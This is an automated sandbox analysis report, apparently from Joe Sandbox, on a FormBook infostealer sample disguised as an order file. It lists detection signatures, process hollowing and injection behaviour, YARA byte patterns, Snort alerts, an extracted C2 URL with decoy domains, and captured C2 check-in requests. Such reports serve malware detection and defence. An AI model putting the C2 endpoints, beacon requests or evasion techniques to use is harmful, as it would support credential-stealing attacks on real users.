
Analysis Report OrderKLB210568.exe

Overview

General Information

Sample Name: OrderKLB210568.exe
Analysis ID: 433298
MD5: 759b0d51f128f54e516ad1941a896d77
SHA1: 13e8d9d44cf15bcfc43952eebc3f10fcafed23a3
SHA256: a08bf89a7e4c15fb33684e268199df85727a6ab759a1d7f3d5ba2b7a0e49f17a
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • OrderKLB210568.exe (PID: 6920 cmdline: 'C:\Users\user\Desktop\OrderKLB210568.exe' MD5: 759B0D51F128F54E516AD1941A896D77)
    • OrderKLB210568.exe (PID: 6968 cmdline: 'C:\Users\user\Desktop\OrderKLB210568.exe' MD5: 759B0D51F128F54E516AD1941A896D77)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6784 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6364 cmdline: /c del 'C:\Users\user\Desktop\OrderKLB210568.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.brochusuell.com/noor/"], "decoy": ["dwlm003.com", "plafon.one", "spacemazevr.com", "geniuslims.com", "selayvolkanwedding.com", "jarsofjoybylinathomas.com", "crosshatch-culinary.com", "mortenmortensen.com", "astromaritravel.com", "that-poor-girl.com", "kovalchukinteriors.com", "hoppingnations.net", "thequbi.com", "shoppermatic.com", "listofcannabinoids.com", "cottoneco.com", "betsrhodeisland.com", "cheerythoughts.com", "joyeriaguitzel.com", "marryobaidanjum.com", "globalapp.net", "ptuananh.club", "headstailsquiz.com", "centerdei.com", "voyagoezy.com", "mysftech.com", "makpumpiran.com", "infathguation.com", "icandrawanything.com", "condorclay.com", "weightlossguruji.com", "zhsysw.com", "radiogogy.com", "pocketeap.com", "gofloorsgo.com", "60-21stave.com", "juliamade.com", "diariodebrasilia.net", "estasenfamilia.com", "agaperpetual.com", "casualcool.xyz", "hfdfg.com", "uipoll.cloud", "indyafilmco.com", "avedonalchemy.online", "store-36.com", "trueandbare.com", "entrenandoamican.com", "tcheaptvwdmall.com", "pirates-bay.gifts", "gamesuptodate.com", "sotoki.com", "pinnacleautism.com", "xbzjist.com", "agencysevenadstrack.com", "atelierbeaumur.site", "stoptraffickingtc.com", "velvetlaceextensions.com", "sanidhestela.com", "crisstings.com", "gshockkuwait.com", "blaxies3.com", "customtiletables.com", "scgcarriers.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.OrderKLB210568.exe.22b0000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.OrderKLB210568.exe.22b0000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.OrderKLB210568.exe.22b0000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
1.2.OrderKLB210568.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.OrderKLB210568.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further entries not shown)

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Found malware configuration
          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.brochusuell.com/noor/"], "decoy": ["dwlm003.com", "plafon.one", "spacemazevr.com", "geniuslims.com", "selayvolkanwedding.com", "jarsofjoybylinathomas.com", "crosshatch-culinary.com", "mortenmortensen.com", "astromaritravel.com", "that-poor-girl.com", "kovalchukinteriors.com", "hoppingnations.net", "thequbi.com", "shoppermatic.com", "listofcannabinoids.com", "cottoneco.com", "betsrhodeisland.com", "cheerythoughts.com", "joyeriaguitzel.com", "marryobaidanjum.com", "globalapp.net", "ptuananh.club", "headstailsquiz.com", "centerdei.com", "voyagoezy.com", "mysftech.com", "makpumpiran.com", "infathguation.com", "icandrawanything.com", "condorclay.com", "weightlossguruji.com", "zhsysw.com", "radiogogy.com", "pocketeap.com", "gofloorsgo.com", "60-21stave.com", "juliamade.com", "diariodebrasilia.net", "estasenfamilia.com", "agaperpetual.com", "casualcool.xyz", "hfdfg.com", "uipoll.cloud", "indyafilmco.com", "avedonalchemy.online", "store-36.com", "trueandbare.com", "entrenandoamican.com", "tcheaptvwdmall.com", "pirates-bay.gifts", "gamesuptodate.com", "sotoki.com", "pinnacleautism.com", "xbzjist.com", "agencysevenadstrack.com", "atelierbeaumur.site", "stoptraffickingtc.com", "velvetlaceextensions.com", "sanidhestela.com", "crisstings.com", "gshockkuwait.com", "blaxies3.com", "customtiletables.com", "scgcarriers.com"]}
Multi AV Scanner detection for submitted file
Source: OrderKLB210568.exe | ReversingLabs: Detection: 32%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: OrderKLB210568.exe | Joe Sandbox ML: detected
Source: 1.2.OrderKLB210568.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.raserver.exe.33fcd80.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.OrderKLB210568.exe.22b0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.raserver.exe.5607960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.1.OrderKLB210568.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: OrderKLB210568.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.712034262.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: OrderKLB210568.exe, 00000000.00000003.659659585.0000000009A30000.00000004.00000001.sdmp, OrderKLB210568.exe, 00000001.00000002.721198139.0000000000BAF000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.923390978.00000000051EF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: OrderKLB210568.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: OrderKLB210568.exe, 00000001.00000002.720929756.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: OrderKLB210568.exe, 00000001.00000002.720929756.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.712034262.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Code function: 0_2_0040263E FindFirstFileA,

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 74.208.236.54:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 74.208.236.54:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 74.208.236.54:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.brochusuell.com/noor/
Source: global traffic | HTTP traffic detected: GET /noor/?1bWh=4rG107LnOcmcuziIBv//fTWAPRyuaqL3ZCNKQGbegtiOA/J/96Y+2s4SPBA+G2lg6sqa&z6A=SROlIdu0 HTTP/1.1 | Host: www.trueandbare.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /noor/?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3/Ui7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0 HTTP/1.1 | Host: www.velvetlaceextensions.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /noor/?1bWh=yBBObmCyAJHV9q/laG6R4VeleE6hM9O/9rRknywdqzDMYOPfeqQhGmZFlzULPSD48dad&z6A=SROlIdu0 HTTP/1.1 | Host: www.pinnacleautism.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /noor/?1bWh=MrymD1JTSi9icjGKk8gDaU+0x7uPJ/DMShO0SAEbIObMq4sdMjmwzvuhTtB1BmEBq3Cn&z6A=SROlIdu0 HTTP/1.1 | Host: www.scgcarriers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /noor/?1bWh=aLSZaEbZcY+nJL/coxA+SeOeWAYt8B9E/LcznQPuCd+SSEpvsuzJsFlKySIeZ1LxQ2fR&z6A=SROlIdu0 HTTP/1.1 | Host: www.customtiletables.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /noor/?1bWh=KyjbU3AKX/1ra4+yobi9yViduRe0x0FUVCXAE/BWsKVHYHaI6gSvGLTvxwAp00IgFIet&z6A=SROlIdu0 HTTP/1.1 | Host: www.marryobaidanjum.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /noor/?1bWh=AHmkjMmF5A51F9E2l+bDZjEpvTE04T0IuK3gjYUfTOhZyeiT49VRPb60+qMIaT57BRzI&z6A=SROlIdu0 HTTP/1.1 | Host: www.astromaritravel.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0 HTTP/1.1 | Host: www.plafon.one | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 104.16.13.194
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: Joe Sandbox View | ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
Source: unknown | DNS traffic detected: queries for: www.tcheaptvwdmall.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 1364 | Connection: close | Date: Fri, 11 Jun 2021 13:43:42 GMT | Server: Apache | X-Frame-Options: deny | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: OrderKLB210568.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: OrderKLB210568.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.670973820.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: raserver.exe, 00000009.00000002.923694061.0000000005782000.00000004.00000001.sdmp | String found in binary or memory: https://www.plafon.one/noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq
Source: C:\Users\user\Desktop\OrderKLB210568.exe | Code function: 0_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: OrderKLB210568.exe, 00000000.00000002.667430799.00000000007AA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
